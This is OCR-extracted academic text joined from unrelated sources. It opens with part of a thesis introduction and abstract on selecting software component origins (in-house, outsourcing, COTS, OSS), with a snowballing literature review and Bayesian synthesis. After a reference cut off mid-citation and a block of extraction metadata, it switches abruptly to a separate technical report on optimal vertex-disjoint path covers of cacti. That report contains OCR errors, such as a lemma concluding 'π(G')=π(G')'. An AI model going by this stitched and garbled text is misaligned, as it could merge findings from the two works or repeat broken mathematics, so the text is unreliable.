After understanding the limitations of in-house development, we investigate the alternatives to in-house development. The objective is to explore how the decision to choose the component origin is made. To understand the existing research on decision-making to choose the component origin, we conducted a systematic literature review (Chapter 3).
The main findings of the review are a list of criteria used to choose a component origin. The review also allowed us to investigate the existing solutions to address the decision-making process for component origin selection. The systematic literature review was conducted using DB search and SB, we reported our experiences on the reliability and efficiency of the SB method in comparison to the DB search (Chapter 4).
Through the systematic literature review, we identified a number of important criteria that might influence the decision to choose a component origin. The next step is to integrate the data collected
from literature with the practitioners’ opinions so that they can use the information in their decisions. We wanted a systematic approach to integrate the data collected from literature and the practitioners’ opinions. This lead us to design a synthesis approach that integrated the literature results and practitioners opinion (Chapter 5).
2 BACKGROUND
This section provides background information of the concepts that are mentioned in the chapters.
Component-based software development: Component-based software development is defined as follows: "The primary role of component-based software engineering is to address the development of systems as an assembly of parts (components), the development of parts as reusable entities, and the maintenance and upgrading of systems by customizing and replacing such parts" [25]. The different parts (components) can be either developed in-house, outsourced or obtained as external components (COTS or OSS).
Component Origin: The different options to get components from are called component origins. The description of each development option is as follows:
- **In-house**: This option is the most straightforward. It involves the development of the software component within the company. It also includes offshoring where the software component is developed within the same company however, in a different location.
- **Outsourcing**: The development of the software component is outsourced to another company often called supplier or vendor. The requirements for the development are provided by the company outsourcing the development.
- **OSS** [44, 65]: It refers to "open source". The OSS components are available for free and the component is provided along with the source code. These components are pre-built and the requirements for building these components are derived from several factors such as developer’s interest or sometimes even the market trend.
• **COTS** [11, 74]: It refers to "components off-the-shelf". These components like the OSS components are pre-built however, they are not free and often source code is not provided along with the components. The COTS components are mainly driven by the market trend.
**Decision to choose component origin [113]:** In this thesis the decision-making is on the strategic level, i.e. to choose a component origin. Such decisions are often derived by some goal such as: improving the software development process or return of investment. The decisions are based on criteria such as quality, time and cost. The decision-making process requires different models to estimate the criteria values such as the cost to buy/build the component, or the time it takes to build, integrate and test the component. The decision-making process involves decision-makers from different roles, these roles might have different expertise in terms background and responsibility and different contributions such as decision initiator, supporter and decider.
### 3 Contribution and Research Gaps
The contributions of this thesis are as mentioned in the below sections.
#### 3.1 Chapter 2
One possible way to produce more with high quality in less time and cost is to use agile methodologies [3]. Studies have reported positive relationship between productivity and the use of agile methods [14]. One of the agile principles promotes continuous delivery of valuable software [3]. However, when the software has hardware dependencies, it is not always feasible to delivery working software frequently.
**Research gap 1:** There is no study conducted to better understand the challenges in in-house development for software-intensive systems. Hence, we conducted a case study to address the identified gap.
This leads us to the objective as follows:
Objective 1: To explore context, practices, challenges and impacts of software-intensive development projects.
3.2 Chapter 3
The context of software-intensive systems imposes limitations in software development improvements. However, utilizing alternative component origins such as external components might contribute in the improvement. For example, the pressure to develop faster due to market competitiveness is identified as a challenge in in-house development (Chapter 2). COTS and OSS are known to be viable options when time to market is a criterion [65]. The constant requirement changes might result in a lot of wasted development effort (Chapter 2), which can be minimized when the right external components are used in particular OSS components as no additional purchasing costs are involved [18, 65, 94]. Understanding complex requirements can be challenging and time consuming (Chapter 2). The developers prefer to use pre-built components such as OSS libraries when the task complexity is high to improve productivity [104]. Using pre-built COTS and OSS components may improve productivity by reducing development effort [65]. Although, using COTS is beneficial when time to market is critical, the time to test and integrate COTS components can be greater than the in-house development effort [40]. This indicates that one option is not always best for all possible scenarios. It is important to know how decisions are made and what criteria are used to select the component origins.
Research gap 2: Primary studies on selection between the component origins have been conducted, however this evidence has not been aggregated and interpreted so far.
Hence, this leads us to our next objective, which is:
Objective 2: To identify factors that could influence the decision to choose among different component origins and solutions for decision-making in the literature.
3.3 Chapter 4
We used SB as the main search strategy to conduct the systematic literature review in Chapter 3.
**Research gap 3:** In software engineering there are fewer studies that use SB as compared to a DB search strategy for searching for primary studies. The potential of SB in terms of its efficiency and reliability in finding the primary studies is not fully understood.
Hence, this leads us to our next objective, which is:
**Objective 3:** To find efficient and reliable search strategies.
3.4 Chapter 5
After aggregating and interpreting evidence from the literature (Chapter 3), we had the results of how the decisions for component selection was made. The next step is to make the evidence available to practitioners in a way that allows practitioners to integrate the evidence from literature into their decisions.
**Research gap 4:** None of the synthesis methods in software engineering research is primarily designed to transfer evidence from literature into practice by taking the experience of practitioners into account.
Therefore, our next objective is –
**Objective 4:** To improve the methodological support for research problems to integrate evidence from literature and practitioners knowledge.
3.5 Research questions
Research questions help us address the research objectives and gaps. The research questions in this thesis are formulated based on the objectives and the research gaps. Four main research questions are formulated which are further divided into sub-research questions. The research questions addressed in the thesis and their mapping to the objectives and research gaps are as shown in Figure 2. Note that the diagram shows the key research questions only, the further sub-questions are mentioned in the individual chapters.
The goals and chapters of the thesis are represented by the circles and blocks respectively in Figure 2. The blocks within each chapter represent the objective and research questions for each chapter, whereas the arrows within the blocks show the connection between the sub-research questions that answer the main research question and the objective. The arrows outside the blocks represent the connection between the Chapters and goals, the connections are labelled accordingly.
The results from Chapters 2 and 3 address goal 1. In addition, Chapter 2 contributes to Chapter 3. The results from Chapter 2 were discussed along with the results of Chapter 3.
Goal 2 is formulated to support goal 1 and is addressed by Chapters 4 and 5. As mentioned earlier the reflections on the methodology used in Chapter 3 are reported in Chapter 4. Chapter 5, contributes to Chapter 3 by providing methodological support to transfer the results from Chapter 3 to practitioners. Overall goal 2 provides methodological support required to address goal 1.
4 RESEARCH METHODOLOGY
Research methods help answering research questions in a systematic and repeatable way. The rigor of research methods not only allow a thorough investigation of a phenomenon but also allow the users/readers to trust and rely on the results. The research methods used in this thesis are: Systematic literature review and case study.
A brief summary of the research methods and their application to the chapters is provided in the following sections.
4.1 Case study (Chapter 2)
Case study is regarded as a suitable research method for software engineering research as it is hard to study a phenomenon in isolation. A case study allows to investigate the phenomenon in its real-life context. The steps involved in case study research are listed and summarized by Runeson and Höst [90] as follows:
1. Case study design: The objectives of the study are defined and the case study is planned based on the objective and research questions. The plan includes details about the case to be studied, the data collection method to be used, and the selection strategy to be used.
2. Preparation for data collection: The procedures and protocol for data collection are defined in this step. The protocol includes details such as: what questions should be asked?
3. Collecting evidence: The data collection is performed to collect evidence.
4. Analysis of collected data: The collected data is analyzed using different analysis methods that suits the collected data.
5. Reporting: The results of the analyzed data are reported. The report should include an elaborate description of the research work and details of the conclusions such as the context they affect.
Case study is used in Chapter 2 to identify the challenges in in-house development of software-intensive systems. Five software-intensive systems were investigated. Fourteen practitioners with different roles involved in the software development were interviewed. Semi-structured interviews were conducted using open-ended questionnaire to collect the data. In addition, the company’s standard process documents were reviewed and the first author participated in the project meetings which allowed to triangulate the collected data. The interviews were analyzed using grounded theory. We used the steps in grounded theory to structure and organize the interview data. The data collection and analysis were conducted in parallel. Which means that after conducting one interview, the interview was transcribed and coded. Based on which the follow-up questions for the next interviews was identified.
4.2 Systematic literature review (Chapters 3 and 4)
Systematic literature reviews are used to aggregate and interpret the evidence through a scientific and repeatable process. It mainly includes the following steps:
1. Study identification. This step includes searching and selecting the primary studies. Mainly two search strategies are used in software engineering: DB search and SB. The primary studies are selected from the search results based on defined inclusion/exclusion criteria.
2. Data extraction. In this step the data from primary studies is extracted in an explicit and consistent way. Data extraction
forms are used to extract data. The design of the extraction forms is driven by the research questions.
3. Quality assessment. The quality of the primary studies is assessed in this step. The assessment is based on rigor and relevance of the primary studies.
4. Analysis. The data from the primary studies is analyzed in this step. Analysis methods such as thematic analysis or narrative analysis are commonly used to analyze data from qualitative studies. Whereas meta-analysis is commonly used to analyze data from quantitative studies.
Chapter 3: In chapter 3, a systematic literature review was conducted to identify factors that could influence the decision to choose among different component origins and solutions for decision-making in the literature. We used SB search strategy using the guidelines in [111] to search for primary studies and DB search using the guidelines in [56] was used to validate and ensure the completeness of the search process. A data extraction form was used to extract data. The quality of the primary studies was evaluated using the rigor and relevance criteria defined in the guidelines proposed in [47]. Thematic analysis using the guideline in [26] was used to analyze the results of the primary studies.
Chapter 4: In Chapter 4, reflections of conducting a systematic literature review using two different search strategies: SB and DB search are reported.
5 OVERVIEW OF THE CHAPTERS
In this section, an overview of the chapters is provided. The overview includes the objective of the chapter, the methods used to achieve the objective and a description of main findings.
5.1 Chapter 2: Perspectives on productivity and delays in large-scale agile projects
The software development process is constantly evolving; methods, process and models supporting software development are used to
improve the software development process. Agile methodologies are such examples that are used to improve the software development process. However, the agile methodologies are implemented in projects contexts that are not consistent with agile principles. The objective of this chapter is to explore context, practices, challenges and impacts of software-intensive development projects.
An exploratory multi-case study is conducted to identify the challenges and impacts of developing software-intensive systems. The employee experiences were collected to identify areas of improvement in the software development practices. The description of the research method used in this chapter is briefly described in Section 4 and detailed description along with the validity threats considered is provided in Chapter 2.
The main findings of this chapter are challenges that affected software development, causes of the challenges and the impact of the challenges on different roles. The identified challenges are related to requirements (creation, understandability, selection, estimation and stability), time-to-market, testing (completeness and infrastructure), collaboration (communication, decision-making, team dynamics and team stability), domain knowledge and product repository. The causes of these challenges are due to project complexity, product characteristics, distributed teams and domain knowledge limitations. The challenges had an impact on planning, shared understanding, coordination, capacity and software quality assurance.
5.2 Chapter 3: Software component decision-making: in-house, OSS, COTS or outsourcing - A systematic literature review
Four widely used component origins are COTS, OSS, outsource and in-house development. Decision-makers make decisions on choosing a component origin for developing a component/s. The objective of this chapter is to present results from the literature interpreting the factors that influence such decisions and the existing solutions supporting the decisions.
A systematic literature review is conducted to identify primary studies. A total of twenty four primary studies were identified. The details of the review protocol are reported briefly in Section 4.2 and in detail in Chapter 2.
Eleven factors that have an influence on the decision to choose among different component origins were identified. The factors are: Time, cost, effort, market trend, source code availability, technical support, license, integration, requirement, maintenance and quality. Most of the primary studies considered two component origins in the decision. The decision between in-house vs. COTS and COTS vs. OSS were the most researched decisions. The solution models proposed in the literature are based on optimization techniques. The criteria considered in the solutions models are time, cost and reliability.
5.3 Chapter 4: Experiences from using snowballing and database searches in systematic literature studies
Systematic literature reviews are ways to aggregate and interpret findings from primary studies. DB search is commonly used for searching the primary studies in software engineering. It is recommended to use SB after DB search to find additional papers. There are few studies that use SB as the main or only method. The effort required in terms of the number of papers to be reviewed to find the primary papers (efficiency) and the capability to find all relevant papers (reliability) might raise some concerns. Therefore, the objective of this chapter is to find efficient and reliable search strategies. A brief summary of the results are provided below and the detailed description is reported in Chapter 4.
The main findings of this chapter are that DB search and SB search are comparable. More papers were reviewed using SB in comparison to the DB search. However, most papers were either duplicates, gray literature or non-English papers which were easy to exclude based on the title. In DB search, such entries can be automatically removed using DB search engines. The total number of abstracts reviewed using DB search and SB were approximately the same. The SB strategy identified 83% of the papers, while DB search identified 46% of the papers and 29% of the papers were commonly found by both DB search and SB. Hence, it can be concluded that SB strategy was efficient and reliable for searching the primary studies to achieve the objective in Chapter 3.
5.4 Chapter 5: Bayesian synthesis in software engineering: Method and illustration
Often the aim of software engineering is to identify or produce best practices, processes, tools and methods. It is important that the best practices are made available to practitioners. Evidence-based software engineering practice encourages integrating practitioner opinions with evidence from literature. This is done to use the evidence from literature and to adapt it to the practitioners’ context using the practitioners’ and/or researchers’ knowledge and experience. We propose the use of Bayesian synthesis to systematize the integration of evidence from literature and practitioners’ subjective opinion. This contributes towards decision-making, as most decisions are based on subjective opinions.
Bayesian synthesis can be summarized in three steps:
- Prior probability: Prior probability is formulated by collecting subjective opinions from practitioners and/or researchers.
- Likelihood: The likelihood is a summary of evidence from literature.
- Posterior probability: Posterior probability is formulated when prior probability and likelihood is combined.
The detailed process to conduct Bayesian synthesis is reported in Chapter 5 along with examples from software engineering research.
6 Conclusions and future work
The overall goal of this thesis is to contribute to the improvement of the software development process to provide timely, high quality and cost efficient solutions. To address this goal we consider the use of different component origins. The methods used in this thesis are case study and systematic literature review. The case study research method is used to identify the challenges of developing software-intensive systems (Chapter 2). The criteria and solutions used to choose between different component origins are identified through a systematic literature review (Chapter 3) and the experiences of conducting the systematic literature review are reported in Chapter
4. A method to integrate the results from literature into practice is proposed in Chapter 5.
The results from Chapter 2 indicate that the context of software-intensive might hinder software development improvement. Some of the hindrances identified were regulations imposed by the domain. In Chapter 3 we investigated alternative component origins (COTS, OSS and outsource) to build software-intensive systems. The results indicate that the decision is not only between internal (in-house) and external component origins (COTS, OSS and outsource), the decision between the external components (e.g. COTS vs. OSS) is also considered in the primary studies. However, it might be the case that the decision between internal and external was taken first before the decision between the external components (e.g. COTS vs. OSS) is considered.
Figure 3: Thesis future work
It is important to note that the use of alternative component origins such as, outsourcing, COTS and OSS are not the complete solutions to mitigate all the challenges of in-house development, rather some component origins are more beneficial than others in certain scenarios. A deeper investigation of the context or scenarios was not possible as the primary studies did not report sufficient details of
the context. In addition, it was not possible to explore the perspectives of all the stakeholders involved in the decision. None of the primary studies focused on the perspective of different stakeholders involved in the decision. To address these limitations a case study is planned to investigate the decision-making process in its real-life context (software-intensive systems). The results from the case study, along with the evidence from the literature will be integrated using the Bayesian synthesis model proposed in Chapter 5. The future work based on this thesis is depicted in Figure 3. The boxes with dotted lines represent future work.
Proposing a solution to support decision-making is also part of future work. The solution will focus on criteria and estimation models to estimate outcomes of the criteria.
REFERENCES
[107] Corrine Voils, Vic Hasselblad, Jamie Crandell, YunKyung Chang, EunJeong Lee, and Margarete Sandelowski. “A Bayesian method for the synthesis of evidence from qualitative and quantitative reports: the example of antiretroviral
ABSTRACT
Context: The amount of software in solutions provided in various domains is continuously growing. These solutions are a mix of hardware and software solutions, often referred to as software-intensive systems. Companies seek to improve the software development process to avoid delays or cost overruns related to the software development.
Objective: The overall goal of this thesis is to improve the software development/building process to provide timely, high quality and cost efficient solutions. The objective is to select the origin of the components (in-house, outsource, components off-the-shelf (COTS) or open source software (OSS)) that facilitates the improvement. The system can be built of components from one origin or a combination of two or more (or even all) origins. Selecting a proper origin for a component is important to get the most out of a component and to optimize the development.
Method: It is necessary to investigate the component origins to make decisions to select among different origins. We conducted a case study to explore the existing challenges in software development. The next step was to identify factors that influence the choice to select among different component origins through a systematic literature review using a snowballing (SB) strategy and a database (DB) search. Furthermore, a Bayesian synthesis process is proposed to integrate the evidence from literature into practice.
Results: The results of this thesis indicate that the context of software-intensive systems such as domain regulations hinder the software development improvement. In addition to in-house development, alternative component origins (outsourcing, COTS, and OSS) are being used for software development. Several factors such as time, cost and license implications influence the selection of component origins. Solutions have been proposed to support the decision-making. However, these solutions consider only a subset of factors identified in the literature.
Conclusions: Each component origin has some advantages and disadvantages. Depending on the scenario, one component origin is more suitable than the others. It is important to investigate the different scenarios and suitability of the component origins, which is recognized as future work of this thesis. In addition, the future work is aimed at providing models to support the decision-making process.
Keywords: Component-based software development, component origin, decision-making, snowballing, database search, Bayesian synthesis.
|
{"Source-Url": "https://old.liu.se/elliit/artiklar-3/1.741938/DeepikaBadampudi.pdf", "len_cl100k_base": 8923, "olmocr-version": "0.1.49", "pdf-total-pages": 51, "total-fallback-pages": 0, "total-input-tokens": 109249, "total-output-tokens": 18778, "length": "2e13", "weborganizer": {"__label__adult": 0.00045180320739746094, "__label__art_design": 0.0004520416259765625, "__label__crime_law": 0.0003249645233154297, "__label__education_jobs": 0.0031032562255859375, "__label__entertainment": 6.920099258422852e-05, "__label__fashion_beauty": 0.00019168853759765625, "__label__finance_business": 0.0004394054412841797, "__label__food_dining": 0.00032138824462890625, "__label__games": 0.0006814002990722656, "__label__hardware": 0.000453948974609375, "__label__health": 0.00033783912658691406, "__label__history": 0.0002276897430419922, "__label__home_hobbies": 8.088350296020508e-05, "__label__industrial": 0.00024580955505371094, "__label__literature": 0.0003693103790283203, "__label__politics": 0.0003020763397216797, "__label__religion": 0.00037384033203125, "__label__science_tech": 0.002468109130859375, "__label__social_life": 0.00013816356658935547, "__label__software": 0.00415802001953125, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.00031065940856933594, "__label__transportation": 0.0004253387451171875, "__label__travel": 0.00017499923706054688}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 71908, 0.05002]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 71908, 0.32274]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 71908, 0.85562]], "google_gemma-3-12b-it_contains_pii": [[0, 199, false], [199, 286, null], [286, 286, null], [286, 498, null], [498, 498, null], [498, 2484, null], [2484, 3020, null], [3020, 4225, null], [4225, 5867, null], [5867, 6381, null], [6381, 6381, null], [6381, 7365, null], [7365, 7365, null], [7365, 9481, null], [9481, 10581, null], [10581, 12285, null], [12285, 14328, null], [14328, 18126, null], [18126, 19508, null], [19508, 19844, null], [19844, 19844, null], [19844, 21713, null], [21713, 23115, null], [23115, 25034, null], [25034, 26864, null], [26864, 28753, null], [28753, 30533, null], [30533, 31013, null], [31013, 32851, null], [32851, 34774, null], [34774, 36608, null], [36608, 38856, null], [38856, 41036, null], [41036, 43031, null], [43031, 44304, null], [44304, 45127, null], [45127, 45127, null], [45127, 46752, null], [46752, 48575, null], [48575, 50316, null], [50316, 52299, null], [52299, 54171, null], [54171, 55909, null], [55909, 57889, null], [57889, 59777, null], [59777, 61676, null], [61676, 63572, null], [63572, 65466, null], [65466, 67418, null], [67418, 69374, null], [69374, 71908, null]], "google_gemma-3-12b-it_is_public_document": [[0, 199, true], [199, 286, null], [286, 286, null], [286, 498, null], [498, 498, null], [498, 2484, null], [2484, 3020, null], [3020, 4225, null], [4225, 5867, null], [5867, 6381, null], [6381, 6381, null], [6381, 7365, null], [7365, 7365, null], [7365, 9481, null], [9481, 10581, null], [10581, 12285, null], [12285, 14328, null], [14328, 18126, null], [18126, 19508, null], [19508, 19844, null], [19844, 19844, null], [19844, 21713, null], [21713, 23115, null], [23115, 25034, null], [25034, 26864, null], [26864, 28753, null], [28753, 30533, null], [30533, 31013, null], [31013, 32851, null], [32851, 34774, null], [34774, 36608, null], [36608, 38856, null], [38856, 41036, null], [41036, 43031, null], [43031, 44304, null], [44304, 45127, null], [45127, 45127, null], [45127, 46752, null], [46752, 48575, null], [48575, 50316, null], [50316, 52299, null], [52299, 54171, null], [54171, 55909, null], [55909, 57889, null], [57889, 59777, null], [59777, 61676, null], [61676, 63572, null], [63572, 65466, null], [65466, 67418, null], [67418, 69374, null], [69374, 71908, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 71908, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 71908, null]], "pdf_page_numbers": [[0, 199, 1], [199, 286, 2], [286, 286, 3], [286, 498, 4], [498, 498, 5], [498, 2484, 6], [2484, 3020, 7], [3020, 4225, 8], [4225, 5867, 9], [5867, 6381, 10], [6381, 6381, 11], [6381, 7365, 12], [7365, 7365, 13], [7365, 9481, 14], [9481, 10581, 15], [10581, 12285, 16], [12285, 14328, 17], [14328, 18126, 18], [18126, 19508, 19], [19508, 19844, 20], [19844, 19844, 21], [19844, 21713, 22], [21713, 23115, 23], [23115, 25034, 24], [25034, 26864, 25], [26864, 28753, 26], [28753, 30533, 27], [30533, 31013, 28], [31013, 32851, 29], [32851, 34774, 30], [34774, 36608, 31], [36608, 38856, 32], [38856, 41036, 33], [41036, 43031, 34], [43031, 44304, 35], [44304, 45127, 36], [45127, 45127, 37], [45127, 46752, 38], [46752, 48575, 39], [48575, 50316, 40], [50316, 52299, 41], [52299, 54171, 42], [54171, 55909, 43], [55909, 57889, 44], [57889, 59777, 45], [59777, 61676, 46], [61676, 63572, 47], [63572, 65466, 48], [65466, 67418, 49], [67418, 69374, 50], [69374, 71908, 51]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 71908, 0.12559]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
480327ae04b4ab5c1162da0fa4392a41d2a90c86
|
OPTIMAL COVERING OF CACTI
BY VERTEX-DISJOINT PATHS
by
Shlomo Moran and Yaron Wolfstahl
Technical Report #501
March 1988
Abstract
A path cover (abbr. cover) of a graph $G$ is a set of vertex-disjoint paths which cover all the vertices of $G$. An optimal cover of $G$ is a cover of the minimum possible cardinality. The optimal covering problem is known to be NP-complete even for cubic 3-connected planar graphs where no face has fewer than 5 edges. Motivated by the intractability of this problem, we develop an efficient optimal covering algorithm for cacti (i.e. graphs where no edge lies on more than one cycle). In doing so we generalize the results of [2] and [9], where optimal covering algorithms for trees and graphs where no two cycles share a vertex were presented.
1. Introduction
Let $G=(V_G, E_G)$ be an undirected graph with no self loops or parallel edges. A path in $G$ is either a single vertex $v \in V_G$ or a sequence of distinct vertices $(v_1, v_2, \ldots, v_k)$ where for $1 \leq i \leq k-1$, $(v_i, v_{i+1}) \in E_G$. A path cover (abbr. cover) of $G$ is a set of vertex-disjoint paths which cover all the vertices of $G$. An optimal cover of $G$ is a cover of the minimum possible cardinality. The cardinality of such a cover is called the covering number of $G$, and is denoted by $\pi(G)$.
The concept of graph covering has many practical applications. For example, in order to establish ring protocols [10], a computer network may be augmented by some auxiliary edges so as to make it Hamiltonian [5]. It is easily verified that the minimum number of additional edges needed to make a network Hamiltonian is identical to the covering number of the network. Other notable applications of graph covering are code optimization [3] and mapping parallel programs to parallel architectures [9].
The problem of finding an optimal cover is NP-complete even for cubic 3-connected planar graphs where no face has fewer than 5 edges [6]. There are, however, several results on optimal covering of restricted classes of graphs. Boesch, Chen and McHugh have derived in [2], among other things, an optimal covering algorithm for trees. Their result was generalized by Pinter and Wolfstahl [9], who developed an efficient optimal covering algorithm for graphs where no two cycles share a vertex. Boesch and Gimpel [3] have considered the related problem of covering a directed acyclic graph by directed paths.
The main result presented in this paper generalizes the above results of [2] and [9]. Specifically, we develop a linear optimal covering algorithm for cacti, that is, graphs where no edge lies on more than one cycle [1,8,11] (see Figure 1). We note that the class of cacti properly contains the graph classes considered in [2] and [9]. The algorithm basically operates by applying two types of rules, namely, edge-deletion rules and a recursive decomposition rule. The edge-deletion rules characterize the edges that can be deleted from a given cactus without affecting its covering number. The recursive decomposition rule provides a tool for constructing an optimal cover of a cactus by decomposing it into two components and covering each component separately. We believe that the combined use of the two types of rules is a feature of independent interest.
The rest of this paper is organized as follows. The edge-deletion rules are presented in Section 2. The recursive decomposition rule is presented in Section 3. The algorithm, developed in Section 4, specifies the order by which those rules are to be applied.
2. Edge-Deletion Rules
The edge-deletion rules are presented in the lemmas below. First, we need some definitions.
Definition 1: Let $S_0$ be a cover of a graph $G=(V_G, E_G)$. We say that $S_0$ employs an edge $e \in E_G$ if some path in $S_0$ includes $e$. A trail starting at $V_1 \in V_G$ is a path $(V_1, v_2, \ldots, v_k)$ containing two or more vertices, where $deg(v_i)=2$ for $1<i<k$ and $deg(v_k)=1$. If exactly one trail starts at $V_1$ then this trail is denoted by $tr(V_1)$. A vertex $v \in V_G$ is a fork if $deg(v)\geq 3$ and at least two trails start at $v$. A vertex $v_1 \in V_G$ is a semi-fork if $deg(v_1)\geq 3$, exactly one trail $(v_1, v_2, \ldots)$ starts at $v_1$, and $v_1$ is adjacent to a vertex $w$ ($w \neq v_2$) where $deg(w)=2$. A trimmed cactus is a cactus containing no forks.
The following proposition is often used in the sequel.
Proposition 1: Let $S$ be a cover of a graph $G=(V_G, E_G)$. Let $u, v$ and $w$ be vertices in $V_G$ where
1. $\{(u,v),(u,w)\} \subseteq E_G$,
2. $(u,w)$ is employed by $S$ but $(u,v)$ is not, and
3. $v$ is an end-vertex of some path in $S$.
Then there exists a cover of $G$, denoted by $\bar{S}_0$, that employs $(u,v)$ but not $(u,w)$ and satisfies $|\bar{S}_0| \leq |S_0|$.
Proof: Straightforward.
Lemma 1 below is easily proved using the above proposition. This lemma can be used to convert a given cactus into union of trimmed cacti.
Lemma 1 [9] (Deletions due to forks and semi-forks): Let $G=(V_G, E_G)$ be a cactus. Let $v_1 \in V_G$ be a vertex of degree 3 or more which is the start-point of a trail $(v_1, v_2, \ldots, v_k)$ and is adjacent to a vertex $w \neq v_2$ of degree 1 or 2. Then $G'=(V_G, E'_G)$ where $E'_G=E_G-\{(x,v_1) \mid (x,v_1) \in E_G, x \neq \{v_2,w\}\}$ satisfies $\pi(G')=\pi(G')$. \(\square\)
Next, we define the concept of end-cycle which plays a key role in the development of our covering algorithm. In fact, the rest of the edge-deletion rules, as well as the recursive decomposition rule, are applicable to end-cycles. The formal definition of end-cycle is preceded by some necessary additional definitions.
Definition 2: Let $G=(V_G, E_G)$ be a connected graph. Let $A=(V_A, E_A)$ and $B=(V_B, E_B)$ be edge-disjoint connected subgraphs of $G$. A vertex $u \in V_G$ separates $A$ from $B$ if for all $v \in V_A$ and $w \in V_B$, all the paths connecting $v$ and $w$ contain $u$. If $u \in V_A$ and $u$ separates $A$ from the subgraph induced by $V_G-V_A$, we say that $u$ separates $A$ from $G$. In this case, we also say that $u$ is a separating vertex. The set of connected components separated from $G$ by a vertex $u$ is denoted by $CC(u)$.
A crown is a connected graph containing a single cycle which satisfies
1. At least one vertex on the cycle is of degree 2.
2. Each vertex \( u \) on the cycle is either of degree 2 or of degree 3. In the latter case, \( u \) is the start-point of a trail.
Given a crown \( C \), the unique cycle in \( C \) is denoted by \( C^0 \), and the degree of each vertex \( v \) in \( C \) is denoted by \( \text{deg}_c(v) \).
Let \( C \) be a crown that is a proper subgraph of a cactus \( G \). We say that \( C \) is an end-cycle of \( G \) (denoted \( C \sim G \)) if the following hold:
1. There exists a vertex \( u \) on \( C^0 \) such that \( \text{deg}_c(u)=2 \) and \( u \) separates \( C \) from \( G \). This vertex is called the anchor of \( C \).
2. If \( u \) belongs to no cycle other than \( C^0 \), then there is a vertex \( v \) not on \( C \), such that \( v \) separates \( C \) from all cycles in \( G \) (see crown \( C_1 \) in Figure 2).
3. If \( u \) belongs to cycles other than \( C^0 \), then all the connected components in \( CC(u) \), except perhaps one, contain at most one cycle (see crown \( C_2 \) in Figure 2).
Let \( C \) be an end-cycle of \( G \). If each vertex \( v \) on \( C^0 \) satisfies \( \text{deg}_c(v)=2 \), then \( C \) is an end-cycle of order 2. If each vertex \( v \) on \( C^0 \) (except for the anchor) satisfies \( \text{deg}_c(v)=3 \), then \( C \) is an end-cycle of order 3. For example, crown \( C_1 \) in Figure 2 is an end-cycle of order 2, while crown \( C_2 \) is an end-cycle of order 3.
(Insert Figure 2 here)
Next, we prove that an end-cycle must exist in any trimmed cactus that properly contains a cycle.
Definition 3: If \( G=(V \cup E) \) has a separation vertex then it is called separable, and it is called nonseparable otherwise.
Let \( V' \subseteq V \). The subgraph induced by \( V' \) is called a nonseparable component of \( G \) if it is nonseparable and if for any larger \( V'' \subseteq V \), the subgraph induced by \( V'' \) is separable. Let \( N = \{n_1, n_2, \ldots, n_k\} \) be set of the nonseparable components of \( G \), and let \( S = \{s_1, s_2, \ldots, s_p\} \) be the set of its separating vertices. The superstructure of \( G \) is the tree \( T=(V_T, E_T) \), where \( V_T=N \cup S \) and \( E_T=\{(s_i, n_j) \mid s_i \text{ is a vertex of } n_j \} \) [4]. For each \( v \in V_T \), let \( g(v) \) denote the nonseparable component or the separation vertex in \( G \) which corresponds to \( v \).
Lemma 2 (Existence of end-cycles): If a trimmed cactus, \( G=(V \cup E) \), properly contains a cycle, then \( G \) contains an end-cycle.
Proof: Denote the set of the nonseparable components of \( G \) by \( N \). By definition of cacti, \( N=C \cup X \) where \( C \) is a set of cycles and \( X \) is a set of edges not on cycles. Let \( T=(N \cup S, E_T) \) be the superstructure of \( G \). Chose a vertex \( s_i \in S \) to be the root of \( T \) (see Figure 3). For any other vertex \( v \), let \( f(v) \) denote the neighbor of \( v \) which is on the unique path between \( s_i \) and \( v \). If \( u=f(v) \) then \( v \) is said to be a son of \( u \). The transitive closure of the son relation is the descendant relation. For each vertex \( v \) of \( T \), let \( A(v) \) denote the set of the neighbors of \( v \), that is, \( A(v) = \{u \mid (u,v) \in E_T \} \). Let \( c \in C \) be vertex
whose distance from \( s \) is maximal over all vertices of \( C \), and let \( s = f(c) \) (observe that \( s \in S \)). Let \( G' \) be the connected component in \( G \) induced by \( c \) and its descendants in \( T \). It is next shown that \( G' \) is an end-cycle in \( G \).
(Insert Figure 3 here)
1. By the choice of \( c \) and the fact that \( G \) is trimmed, \( G' \) is a crown. Moreover, \( g(s) \) separates \( G' \) from \( G \).
2. If \( (A(s) \cap C) = \{c\} \) then \( f(s) \in X \), so \( g(f(s)) \in E_\sigma \). Let \( g(f(s)) = (v_1, v_2) \) where \( v_1 = g(s) \). Observe that \( v_2 \) separates \( G' \) from all other cycles in \( G \), for otherwise there would be a vertex \( c' \in C \), a descendant of \( s \), whose distance from the root is bigger than that of \( c \). Hence, \( G' \) is an end-cycle in \( G \).
3. Assume that \( A(s) \) contains a vertex of \( C \) other than \( c \). By the choice of \( c \), no descendant of \( s \) is a vertex of \( C \), unless it belongs to \( A(s) \). Thus, no component in \( CC(g(s)) \), except perhaps for the one corresponding to \( g(f(s)) \), contains more than one cycle. We conclude that \( G' \) is an end-cycle. \( \Box \)
